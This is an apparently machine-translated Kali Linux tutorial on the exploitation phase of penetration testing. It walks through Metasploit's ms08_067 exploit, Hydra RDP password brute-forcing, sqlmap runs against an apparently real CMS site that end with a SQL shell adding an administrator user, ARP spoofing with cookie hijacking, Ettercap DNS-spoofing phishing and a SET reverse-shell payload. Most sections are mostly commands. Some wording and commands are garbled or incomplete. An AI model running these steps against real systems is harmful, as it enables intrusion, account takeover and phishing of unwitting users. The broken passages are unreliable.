Kali basic knowledge of Linux Infiltration (iii): Exploit

The exploit phase utilizes the information obtained and the various attack methods to implement infiltration. An encrypted communication vulnerability diagnosis for a Network application vulnerability diagnostic project must be performed. As the name implies, exploit the vulnerability to achieve the purpose of the attack.

• Metasploit Framework
• Rdesktop + Hydra
• Sqlmap
• Arpspoof
• Tcpdump + Ferret + Hamster
• Ettercap
• SET

Metasploit Framework

Metasploit is an open source security vulnerability detection Tool, and the Metasploit Framework (MSF) was released as an open source in 2003 and is a freely available development framework. It is a powerful open-source platform for developing, testing, and using malicious code, an environment that provides a reliable platform for penetration testing, shellcode authoring, and vulnerability research. This extensible model integrates load control (payload), encoders (encode), no-action generators (Nops), and vulnerabilities to make the Metasploit Framework a way to study high-risk vulnerabilities. It integrates common overflow vulnerabilities and popular shellcode on various platforms, and is constantly updated.

Overview: MSF architecture, components

Example Demo: Intrusion Windows XP SP3 (ms08_067)

MSF architecture

The Metasploit framework does not only have the exploit (overflow) collection feature, it allows you to focus on creating your own overflow module or two development. Few are implemented in assembler and C, and the rest is implemented by Ruby. Overall architecture:

Tools integrates a variety of utilities, most of which are collected for other software

PLUGINS a variety of plugins, most of which are collected by other software. Call its API directly, but only work in the console.

MODULES the various modules of the current Metasploit Framework

MSF core represents the basic API provided by the Metasploit framework core and defines the framework for MSF.

and integrate each sub-system together. The organization is fragmented and is not recommended for change.

MSF Base provides a number of extended, easy-to-use APIs for invocation, allowing changes

The various libraries contained in the Rex LIBRARIES Metasploit Framework are collections of classes, methods, and modules

CLI represents the command line interface

GUI Graphical user interface

Console Console User interface

Web page interface, currently no longer supported

The exploits definition implements a number of overflow modules that do not contain payload words that are an aux

Payload consists of some code that can be dynamically run on a remote host

Nops non-operational instructions for generating buffer fills

Aux modules for auxiliary attacks, such as port scanning tools

Encoders re-encode for anti-detection functions, etc.

Access to Msfconsole can be configured after the database to more convenient and faster query various modules

Start PostgreSQL First

sudo  systemctl start postgresql

Switch to PostgreSQL

su postgres

Create a PostgreSQL Database account

create user root –P

Next, you will be prompted for your password, then confirm your password

Create a database

createdb --owner=root nexp_db

The owner parameter specifies the name of the database, and the next parameter is the database

Then exit into the MSF connection database

db_connect root:[email protected]localhost/nexp_db

After successful connection, you will be prompted:

[-] PostgreSQL already connected to MSF

[-] Run db_disconnect First If you wish to connect to a different database

Msfconsole support System All commands, enter help in terminal to view "Core Commands", "Database backend Commands", "Exploit Commands"

Several vulnerability scanning components of MSF integration Nmap

Nmap is suitable for WINODWS, Linux, Mac and other operating systems. It is used for host discovery, port discovery or enumeration, service discovery, detection of operating system, hardware address, software version, and vulnerability. The Metasploit framework platform integrates NMAP components. It is usually necessary to collect the required information before initiating an attack on the target system, such as acquiring active hosts on the network, ports open to the host, and so on.

Nessus

Nessus is one of the most widely used vulnerability scanning tools today. Nessus uses client/sever mode, the server side is responsible for security checks, the client is used to configure the Management Server side. The plug-in system is also used on the server, allowing users to join plug-ins that perform specific functions, which allows for faster and more complex security checks.

Nmap for Port scanning

nmap -sS -v www.hdu.edu.cn -oX Desktop/out.xml

Import saved scan results with the Db_import command

db_import Desktop/out.xml

Use the hosts command to view the objects contained in the scan results in XML format

Use the Services command to view detailed service information for the following open ports

Use the Notes command to export details by the port displayed by the scan results

Examples demonstrate the MSF intrusion WinXP (ms_08067) Environment:

Windows XP SP3

ip:172.16.211.129

Kali Linux

ip:172.16.211.128

Principle of experiment

Vulnerability Name: Windows Server services RPC Request buffer Overflow Vulnerability (ms08-067)

This security update resolves a privately reported vulnerability in the Server service. The vulnerability could allow remote code execution if a user receives a specially crafted RPC request on an affected system. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability to run arbitrary code without authentication. This vulnerability could be used for worm attacks. Firewall best practices and standard default firewall configurations help protect network resources from attacks originating outside the enterprise.

Experimental process

Searching for MS08067 vulnerability msfconsole using the search command

Get from the results

Name:exploit/windows/smb/ms08_067_netapi

Disclosure date:2008-10-28

Rank:great

description:ms08-067 Microsoft Server Service Relative Path Stack corruption

To invoke the MS08067 vulnerability attack program using the use command

Use Exploit/windows/smb/ms08_067_netapi

Use the show Options command to see the options you need to set

You can see that you also need to set Rhost (destination address), Exploit Target (attack target)

Set the Module Options using the SET command, where you need to set the destination IP

That is set RHOST 172.16.211.129

Once set using the SET command, you can then use the Show Options command to view the settings

You can see that the target IP has been set.

Then set exploit target and use show targets to view the options

You can see that this vulnerability exists in the following versions of the system

Because the XP system demonstrated by the example is WinXP SP3 Simplified Chinese version, that is

Set target using the set target command, which is set target 34

Use the show options to see that all settings are complete and then attack using exploit or run

After executing the exploit command, get a Meterpreter

Enter a shell in Meterpreter to enter the cmd window

You can then execute the cmd command, such as opening the RDP service

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

Use the Netstat-an command to see if the port is open and you can see the open

Then use the Net USER command to view the users in the XP system

You can see that there is a user for Sysorem

Then the login password is exploded for the specified user, such as the Sysorem user here.

hydra 172.16.211.129 rdp -l sysorem -P Desktop/pass.txt

Using Hydra blasting Password: 12345 then you can log in directly to XP for remote control

rdesktop -a 32 -u sysorem -p 12345 172.16.211.129:3389

Sqlmap

SQLMAP is an automated SQL injection tool whose main function is to scan, discover, and exploit the SQL injection vulnerability of a given URL, currently supported by MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, and SAP MaxDB. Five unique SQL injection techniques are used, namely:

1) A Boolean-based blind, that can be based on the return page to determine the conditions of the true and false injection.

2) The time-based blind, that is, cannot judge any information based on the page return content, using conditional statements to see if the time delay statement is executed (that is, if the page return time is increased) to determine.

3) based on the error injection, that is, the page will return incorrect information, or the results of the injected statement directly back to the page.

4) Joint query injection, which can be injected using the Union case.

5) heap Query injection, you can execute the execution of multiple statements at the same time injection.

Summary: Simple introduction to common grammar

Example Demo: Instance demo to invade a server through an injection point

Common syntax Introduction

Get the current user name

sqlmap -u "http://url/news?id=1" --current-user 

Get the current database name

sqlmap -u "http://www.xxoo.com/news?id=1" —current-db

List name

sqlmap -u "http://www.xxoo.com/news?id=1" --tables -D “db_name”

Column fields

sqlmap -u "http://url/news?id=1" --columns -T "tablename" users-D "db_name" -v 0 #

Get field Contents

"http://url/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0

Example demo to invade a server with one injection point

Target site: a CMS

Test for presence of injection

sqlmap -u "http://xxx/newsInfo.php?news_id=1&classsn=8001" --level 2

Payload

SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b766271,0x5a794e4d4a626f5857704c4959506c49507a58666b4c44717864664b596d586d797059515752464d,0x716a786b71),NULL,NULL-- PHML&classsn=9003

Query database user, return ht_zhengke20%

sqlmap -u “http://xxx/newsInfo.php?news_id=1&classsn=8001” --current-user

Whether the query is an administrator account, returns True

sqlmap -u “http://xxx/newsInfo.php?news_id=1&classsn=8001”  --is-dba 

Column Database

sqlmap -u “http://xxx/newsInfo.php?news_id=1&classsn=8001” --dbs

Column database user

sqlmap -u “http://xxx/newsInfo.php?news_id=1&classsn=8001” --users

Column database user password

sqlmap -u “http://xxx/newsInfo.php?news_id=1&classsn=8001” --passwords

Get ht_zhengke2 user's plaintext password to Ht_zhengke2

Nmap Scan found open 3389 port

Enter SQL Shell

sqlmap -u “http://xxx/newsInfo.php?news_id=1&classsn=8001” --sql-shell

Add a user to the Sqlshell and elevate to the administrator

NET user root 12345/add

net localgroup Administrators Root/add

Telnet to the server with newly added users

Arpspoof

Because the network flow of the LAN is not based on the IP address, it is transmitted according to the MAC address. Therefore, the MAC address on a is forged into a nonexistent MAC address, which will cause the network is not available, a can not ping C. This is a simple ARP spoofing that exploits the vulnerabilities of the ARP protocol. Often in the intranet infiltration, can be used with other tools for network sniffing, traffic hijacking and other functions.

Example application:

ARP spoofing attacks and session hijacking

ARP off-network attack

Command structure:

arpspoof [-i interface] [-t target] host

-I represents the NIC,-T represents the target

ARP Spoofing attack

Windows XP SP3

ip:172.16.211.129

Kali Linux

ip:172.16.211.128

Gateway

ip:172.16.211.2

Turn on IP forwarding (use cat to see if the settings are successful)

1 >> /proc/sys/net/ipv4/ip_forward

Redirect the victim's traffic to the attacker

arpspoof   -i   eth0   -t  172.16.211.129   172.16.211.2

Tcpdump Grab bag (can also use Wireshark)

Because the gateway has routing capabilities, the traffic to the target host can be obtained as long as the local network card is monitored.

Simple usage: tcpdump-w cookie.cap #抓取所有流量写入cookie. Cap

For a period of time to deceive, can casually browse some of the Web pages, chat and so on, such as now access to digital Hangzhou electric, after a period of time to stop cheating, stop grabbing packets, and with the use of ferret processing crawl traffic.

Simple usage: ferret-r cookie.cap #处理抓取的流量

Hamster

Make sure the processed cookie.cap is running after the root user root directory Hamster

Then set the browser proxy as prompted

Kali's own Firefox browser settings agent

Access Hamster or http://127.0.0.1:1234 in the browser after the agent is set up.

Click on the left link to successfully hijack cookies for access

ARP off-network attack

Turn off local IP forwarding, when traffic from the gateway arrives at this time, the target machine cannot get the data from the gateway, thus "off-grid"

arpspoof   -i   eth0   172.16.211.1   172.16.211.128

Ettercap

Ettercap is a powerful spoofing tool that allows testers to create and send forged packages, from network adapters to application software-level packages, to bind listening data to a local port, and so on, with great speed. is an auxiliary tool commonly used in man-in-the-middle attacks.

However, more information, interested in the small partners can learn the next

Example Demo: MIMT's DNS spoofing (phishing)

Configure DNS (/ETC/ETTERCAP/ETTER.DNS) 172.16.211.128 for native on LAN address

Turn on the local Web service

Direct access will return to the Apache default page

Use the command ettercap-g to start Ettercap and select Unifind sniffing for network card configuration

Then scan the surviving hosts, scan the hosts list of clicked

Add the gateway address to the TARGET1 and add the attack target to the Target2

Then set the man-in-the-middle attack in the form of ARP spoofing and set bidirectional spoofing

Then enable the Dns_spoof plugin

Then start DNS spoofing

Then, when browsing the www.hdu.edu.cn on the target host, you can achieve the effect of spoofing.

DNS spoofing is often used to obtain administrator information, phishing, etc. in the network infiltration. For example, can forge the intranet router management page, deceive the user to enter the real account password on the management page.

SET

Set is a tool set using the theory of social engineering. It connects with Metasploit to automatically build Microsoft's latest building vulnerabilities, Adobe PDF vulnerabilities, Java applet vulnerabilities, and more, that can be applied to social engineering technologies. It is not only easy to use, but also clever to deceive the eyes of ordinary users. Therefore, it is also an extremely dangerous tool.

Enter the Setoolkit startup set in the shell, which can be tested for social work, penetration, etc., where 1 is the social worker

Choose a connection method of 4 to create a payload and listener

Because the system used for the demo is WinXP 32bit, the choice of connection method is 2

Then set the native IP and port (where the port is set to 4445 to avoid collisions)

Then set will start MSF and through the above set of payloads, when the user is induced and reverse connection to the native 4445 port, will get a meterpreter, get Meterpreter, can be entered? View available commands

For example screenshot screenshot

Kali basic knowledge of Linux Infiltration (iii): Exploit